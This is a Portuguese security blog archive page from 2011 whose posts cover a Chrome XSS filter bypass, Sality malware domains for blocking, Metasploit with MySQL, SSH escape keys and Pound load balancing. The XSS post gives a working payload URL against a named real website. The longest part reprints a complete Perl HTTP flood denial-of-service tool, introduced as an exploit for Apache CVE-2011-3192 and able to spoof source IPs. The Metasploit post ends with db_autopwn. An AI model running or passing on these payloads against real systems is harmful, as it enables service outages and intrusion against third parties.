Quando se trata de segurança, temos que ter em mente que sempre haverá um caminho alternativo para burlar a segurança, basta você descobrir este caminho.
Neste post vou mostrar como Nick Nikiforakis encontrou este caminho alternativo para burlar o sistema de filtro de XSS do Google Chrome.
Este filtro do Chrome impede qualquer tentativa de XSS acessado por você. Vamos fazer dois testes, utilizando o Chore e o Firefox.
A URL abaixo é vulnerável a XSS onde mostra o número 1 em uma janela da pop-up.
Abra a URL abaixo no firefox e depois no Chrome.
http://www.dsm.com/en_US/cworld/public/home/pages/searchResults.jsp?search-site=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E&noMimimumKeywords=false
Perceba que no Firefox o pop-up apareceu, mas no Chrome foi barrado pelo filtro.
A ideia inicial do Nick é não colocar a tag para fechar o JavaScript, com isso o código HTML passou a ser executado dentro do script, mas com erro, até porque o JavaScript não entende HTML. Em seguida ele comentou o código HTML (/* &b=*/) para que o script em java fosse executado, e funcionou.
bypassing XSS filter Chrome:
Agora vamos executar nossa URL nos dois browser usando esse pequeno "trick".
http://www.dsm.com/en_US/cworld/public/home/pages/searchResults.jsp?search-site="><script>alert(1);/*&noMimimumKeywords=*/</script>
Perceba que foi executado tanto no Firefox como no Chrome.
fonte: http://blog.securitee.org/?p=37
sexta-feira, 16 de setembro de 2011
Disconnect Stalled SSH Session
Muito boa essa dica:
This doesn't really apply to Windows users as you can just close puTTy. But for everyone else, stalled SSH Sessions suck. You are either slamming enter to get it to realize it's been disconnected or just waiting for it to. Well, for those of us who are impatient just hit:
~.
Thats right, SHIFT + the key above TAB, release, and hit the period. You may have to hit ENTER first to clear the buffer or whatever it does, but do that and it will disconnect the SSH session right away.
Stupid trick, but I use it all the time (especially on shotty MiFi connections).
fonte: http://www.room362.com/blog/2011/9/15/disconnect-stalled-ssh-session.html
~.
Thats right, SHIFT + the key above TAB, release, and hit the period. You may have to hit ENTER first to clear the buffer or whatever it does, but do that and it will disconnect the SSH session right away.
Stupid trick, but I use it all the time (especially on shotty MiFi connections).
The ~ is the escape character, similar to Ctrl+A in screen. If you try ~?, you get the following dialogue:
$ ~?
Supported escape sequences:
~. - terminate connection (and any multiplexed sessions)
~B - send a BREAK to the remote system
~C - open a command line
~R - Request rekey (SSH protocol 2 only)
~^Z - suspend ssh
~# - list forwarded connections
~& - background ssh (when waiting for connections to terminate)
~? - this message
~~ - send the escape character by typing it twice
(Note that escapes are only recognized immediately after newline.)
Another very useful trick is to use ~C to open a command line, then use -L or -R to add additional SSH forwarding tunnels without breaking your existing SSH connection.
$ ~?
Supported escape sequences:
~. - terminate connection (and any multiplexed sessions)
~B - send a BREAK to the remote system
~C - open a command line
~R - Request rekey (SSH protocol 2 only)
~^Z - suspend ssh
~# - list forwarded connections
~& - background ssh (when waiting for connections to terminate)
~? - this message
~~ - send the escape character by typing it twice
(Note that escapes are only recognized immediately after newline.)
Another very useful trick is to use ~C to open a command line, then use -L or -R to add additional SSH forwarding tunnels without breaking your existing SSH connection.
fonte: http://www.room362.com/blog/2011/9/15/disconnect-stalled-ssh-session.html
sexta-feira, 9 de setembro de 2011
McAfee Labs - Combating Threats - W32/Sality Virus
Segundo o paper da McAfee chamado Combating Threats - W32/Sality Virus segue abaixo a lista dos domínios que o Sality acessa:
hxxp://89.119.67.154
hxxp://kukutrustnet777.info
hxxp://kukutrustnet888.info
hxxp://kukutrustnet987.info
hxxp://www.kjwre9fqwieluoi.info
hxxp://bpowqbvcfds677.info
hxxp://bmakemegood24.com
hxxp://bperfectchoice1.com
hxxp://bcash-ddt.net
hxxp://bddr-cash.net
hxxp://btrn-cash.net
hxxp://bmoney-frn.net
hxxp://bclr-cash.net
hxxp://bxxxl-cash.net
hxxp://balsfhkewo7i487fksd.info
hxxp://buynvf96.info
1.yimg.com
Us.i1.yimg.com
http:.//ad.yieldmanager.com
mattfoll.eu.interia.pl
bjerm.mass.hc.ru
www.f5ds1jkkk4d.info
www.g1ikdcvns3sdsal.info
www.h7smcnrwlsdn34fgv.info
www.inform1ongung.info
www.kukutrustnet.org
www.lukki6nd2kdnc.info
hxxp://89.119.67.154
hxxp://kukutrustnet777.info
hxxp://kukutrustnet888.info
hxxp://kukutrustnet987.info
hxxp://www.kjwre9fqwieluoi.info
hxxp://bpowqbvcfds677.info
hxxp://bmakemegood24.com
hxxp://bperfectchoice1.com
hxxp://bcash-ddt.net
hxxp://bddr-cash.net
hxxp://btrn-cash.net
hxxp://bmoney-frn.net
hxxp://bclr-cash.net
hxxp://bxxxl-cash.net
hxxp://balsfhkewo7i487fksd.info
hxxp://buynvf96.info
1.yimg.com
Us.i1.yimg.com
http:.//ad.yieldmanager.com
mattfoll.eu.interia.pl
bjerm.mass.hc.ru
www.f5ds1jkkk4d.info
www.g1ikdcvns3sdsal.info
www.h7smcnrwlsdn34fgv.info
www.inform1ongung.info
www.kukutrustnet.org
www.lukki6nd2kdnc.info
Com essa informação você pode detectar possíveis máquinas infectadas com o Sality usando o tcpdump ou colocar esses domínios no seu Firewall de borda.
segunda-feira, 5 de setembro de 2011
Instalando e configurando o Mysql para ser usado com o Metasploit 4
Recentemente instalei o Metasploit 4 no Ubuntu 11.04 e para a minha surpresa o suporte do banco de dados não vem habilitado por padrão. Creio que em outros posts já mostrei como fazer isso, apesar de estar sendo um pouco repetitivo tenho certeza que este post vai ajudar muita gente. Vou mostrar como instalar e configurar o Mysql para ser usado pelo Metasploit 4, estarei usando o Ubuntu 11.04.
Passo 1: Baixe o Metasploit 4
link para download (http://www.metasploit.com/download/)
baixe a versão para Linux que diz assim:
Full Setup Includes dependencies,
Console 2, Java & Postgres
Passo 2: Instalando
Dê permissão de execução para o arquivo:
#chmod +x framework-4.0.0-linux-full.run
Agora instale o metasploit:
#./framework-4.0.0-linux-full.run
Instale as dependencias para o ruby:
#apt-get install ruby libopenssl-ruby libyaml-ruby libdl-ruby libiconv-ruby libreadline-ruby irb ri rubygems
Passo 3: Instalando o Mysql
#apt-get install mysql-server
Vai pedir a senha do banco, para este post vou colocar 123456 como senha.
#apt-get install rubygems libmysqlclient-dev
#gem install mysql
Configure para que o Metasploit ao iniciar se conecte no mysql:
#cat > ~/.msf4/msfconsole.rc
db_driver mysql
db_connect root:123456@127.0.0.1:3306/msf_database
Pronto agora temos nosso Metasploit 4 rodando e com o suporte ao banco de dados Mysql.
exemplo:
msf > db_nmap -n -sV 192.168.1.1
msf > db_autopwn -p -t -e -r
Simple like a hacker day with skills.
by Osvaldo
quinta-feira, 1 de setembro de 2011
Apache < 2.2.20 vulneravel a DoS (CVE-2011-3192)
O servidor web Apache versões abaixo da 2.2.20 esta vulneravel a DoS (multiple ranges DoS). Esta vulnerabilidade tem o CVE ID CVE-2011-3192. Já foi publicado um simples código em perl que explora essa vulnerabilidade, consumindo CPU e memória do servidor.
Segue abaixo o código em perl para explorar essa vulnerabilidade:
# HTTPKiller - FHTTP Kit by Xianur0
# Copyright (C) 2011 Oscar GarcÃa López (http://hackingtelevision.blogspot.com)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see
#
# xianur0.null@gmail.com
# http://hackingtelevision.blogspot.com/
package control;
my $ip;
sub new {
my ($class,$i) = @_;
$ip = $i;
my $self={};
$ip = $i;
bless $self, $class;
return $self;
}
sub mas {
my ($self,$veces) = @_;
$veces = 1 if($veces eq "");
my ($a,$e,$o,$b) = split(/\./,$ip);
for($as=0;$as<$veces;$as++) {
$b++;
if($b>=255) {$b=0;$o++;}
if($o>=255) {$o=0;$e++;}
if($e>=255) {$e=0;$a++;}
die("No mas IPs!\n") if($a>=255);
}
$ip = join "",$a,".",$e,".",$o,".",$b;
return $ip;
}
1;
package main;
use Socket;
use IO::Socket::INET;
use threads ('yield',
'exit' => 'threads_only',
'stringify');
use threads::shared;
my $ua = "Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0";
my $method = "HEAD";
my $hilo;
my @vals = ('a','b','c','d','e','f','g','h','i','j','k','l','n','o','p','q','r','s','t','u','w','x','y','z',0,1,2,3,4,5,6,7,8,9);
my $randsemilla = "";
for($i = 0; $i < 30; $i++) {
$randsemilla .= $vals[int(rand($#vals))];
}
sub socker {
my ($remote,$port) = @_;
my ($iaddr, $paddr, $proto);
$iaddr = inet_aton($remote) || return false;
$paddr = sockaddr_in($port, $iaddr) || return false;
$proto = getprotobyname('tcp');
socket(SOCK, PF_INET, SOCK_STREAM, $proto);
connect(SOCK, $paddr) || return false;
return SOCK;
}
sub sender {
my ($max,$puerto,$host,$file) = @_;
my $sock;
while(true) {
my $paquete = "";
$sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $puerto, Proto => 'tcp');
unless($sock) {
print "\n[x] Unable to connect...\n\n";
sleep(1);
next;
}
for($i=0;$i<$porconexion;$i++) {
$ipinicial = $sumador->mas();
my $filepath = $file;
$filepath =~ s/(\{mn\-fakeip\})/$ipinicial/g;
$paquete .= join "",$method," /",$filepath," HTTP/1.1\r\nHost: ",$host,"\r\nUser-Agent: ",$ua,"\r\nCLIENT-IP: ",$ipinicial,"\r\nX-Forwarded-For: ",$ipinicial,"\r\nIf-None-Match: ",$randsemilla,"\r\nIf-Modified-Since: Fri, 1 Dec 1969 23:00:00 GMT\r\nAccept: */*\r\nAccept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip,deflate\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nContent-Length: 0\r\nConnection: Keep-Alive\r\n\r\n";
}
$paquete =~ s/Connection: Keep-Alive\r\n\r\n$/Connection: Close\r\n\r\n/;
print $sock $paquete;
}
}
sub sender2 {
my ($puerto,$host,$paquete) = @_;
my $sock;
my $sumador :shared;
while(true) {
$sock = &socker($host,$puerto);
unless($sock) {
print "\n[x] Unable to connect...\n\n";
next;
}
print $sock $paquete;
}
}
sub comenzar {
$SIG{'KILL'} = sub { print "Killed...\n"; threads->exit(); };
$url = $ARGV[0];
print "URL: ".$url."\n";
$max = $ARGV[1];
$porconexion = $ARGV[2];
$ipfake = $ARGV[3];
if($porconexion < 1) {
print "[-]Invalid arg 3...\n";
exit;
}
if($url !~ /^http:\/\//) {
die("[x] Invalid URL!\n");
}
$url .= "/" if($url =~ /^http?:\/\/([\d\w\:\.-]*)$/);
($host,$file) = ($url =~ /^http?:\/\/(.*?)\/(.*)/);
$puerto = 80;
($host,$puerto) = ($host =~ /(.*?):(.*)/) if($host =~ /(.*?):(.*)/);
$file =~ s/\s/%20/g;
print join "","[!] Launching ",$max," threads!\n";
$file = "/".$file if($file !~ /^\//);
print join "","Target: ",$host,":",$puerto,"\nPath: ",$file,"\n\n";
# entonces toca un paquete unico, no tiene caso que se genere por cada hilo :)...
if($ipfake eq "") {
# envio repetitivo
my $paquetebase = join "",$method," /",$file," HTTP/1.1\r\nHost: ",$host,"\r\nUser-Agent: ",$ua,"\r\nIf-None-Match: ",$randsemilla,"\r\nIf-Modified-Since: Fri, 1 Dec 1969 23:00:00 GMT\r\nAccept: */*\r\nAccept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip,deflate\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nContent-Length: 0\r\nConnection: Keep-Alive\r\n\r\n";
$paquetesender = "";
$paquetesender = $paquetebase x $porconexion;
$paquetesender =~ s/Connection: Keep-Alive\r\n\r\n$/Connection: Close\r\n\r\n/;
for($v=0;$v<$max;$v++) {
$thr[$v] = threads->create('sender2', ($puerto,$host,$paquetesender));
}
} else {
# envio con ip...
$sumador = control->new($ipfake);
for($v=0;$v<$max;$v++) {
$thr[$v] = threads->create('sender', ($porconexion,$puerto,$host,$file));
}
}
print "[-] Launched!\n";
for($v=0;$v<$max;$v++) {
if ($thr[$v]->is_running()) {
sleep(3);
$v--;
}
}
print "Fin!\n";
}
if($#ARGV > 2) {
comenzar();
} else {
die("Use: mn.pl [url] [Connections] [Requests per connection] [Initial false IP (optional)]\n");
}
Tenha consciência dos seus atos.
by Osvaldo
Load Balancing Apache Server
Os vídeos e posts do Network NUTS são excelentes, já sou fã desses caras. Segue um vídeo interessante sobre Load Balancing.
Take this - I have more than one APACHE server. I I want to have load balancing between my apache servers. So whenever a HTTP/HTTPS request comes in, the request should be forwarded to all apache servers in a distributed manner. And also I want to hide my apache server IP from Internet and Intranet.
How to do this?
Welcome - POUND.
1. Pound is a reverse proxy load balancing server.
2. It takes the request from HTTP/HTTPS clients and distribute them to one or more web servers.
3. It can detect when the backend server (actual apache server) fails / recovered and take decision accordingly.
4. Priority can be set. Default is 5. Range is 1 - 9.
5. Higher priority servers are used more.
Consider this picture:
Here I want my Pound Gateway running on 172.24.0.254 should distribute the HTTP/HTTPS requests to two hidden APACHE servers running on 172.24.0.10 and 172.24.0.11 and further I want more requests to be catered by 172.24.0.10 as it is having a better hardware as compared to 172.24.0.11.
STEP #1 - Install Pound on 172.24.0.254 - You can easily download "pound" from Internet.
STEP #2 - Configure the main configuration file for pound "/etc/pound.cfg", as shown:
STEP #3 - After the configuration is done, just restart the "pound" service.
Enjoy.
God Bless.
by alok on Mon Apr 05, 2010 11:36 am
fonte: http://networknuts.net/forum/viewtopic.php?f=3&t=256&sid=e0fbdbf9c21050d0392192c987e7b6d9
Take this - I have more than one APACHE server. I I want to have load balancing between my apache servers. So whenever a HTTP/HTTPS request comes in, the request should be forwarded to all apache servers in a distributed manner. And also I want to hide my apache server IP from Internet and Intranet.
How to do this?
Welcome - POUND.
1. Pound is a reverse proxy load balancing server.
2. It takes the request from HTTP/HTTPS clients and distribute them to one or more web servers.
3. It can detect when the backend server (actual apache server) fails / recovered and take decision accordingly.
4. Priority can be set. Default is 5. Range is 1 - 9.
5. Higher priority servers are used more.
Consider this picture:
- Pound Gateway used for Load Balancing between Apache Servers
Here I want my Pound Gateway running on 172.24.0.254 should distribute the HTTP/HTTPS requests to two hidden APACHE servers running on 172.24.0.10 and 172.24.0.11 and further I want more requests to be catered by 172.24.0.10 as it is having a better hardware as compared to 172.24.0.11.
STEP #1 - Install Pound on 172.24.0.254 - You can easily download "pound" from Internet.
STEP #2 - Configure the main configuration file for pound "/etc/pound.cfg", as shown:
- Pound configuration showing load balancing between two apache servers.
STEP #3 - After the configuration is done, just restart the "pound" service.
Enjoy.
God Bless.
by alok on Mon Apr 05, 2010 11:36 am
fonte: http://networknuts.net/forum/viewtopic.php?f=3&t=256&sid=e0fbdbf9c21050d0392192c987e7b6d9
Assinar:
Postagens (Atom)